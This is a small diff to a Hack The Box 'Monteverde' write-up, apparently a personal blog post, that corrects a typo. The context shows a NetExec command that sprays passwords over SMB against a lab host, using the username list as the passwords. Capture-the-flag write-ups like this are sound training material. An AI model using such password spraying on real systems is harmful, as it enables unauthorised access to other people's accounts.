Vorkharium/vorkharium.github.io/_posts/2024-11-02-HTB-Monteverde-Write-up.md

 roleary
 smorgan
 ```
-And then user the list usernames.txt to carry out a password spraying attack using NetExec:
+And then use the list usernames.txt to carry out a password spraying attack using NetExec:
 ```shell
 nxc smb 10.129.228.111 -u usernames.txt -p usernames.txt --continue-on-success
 ```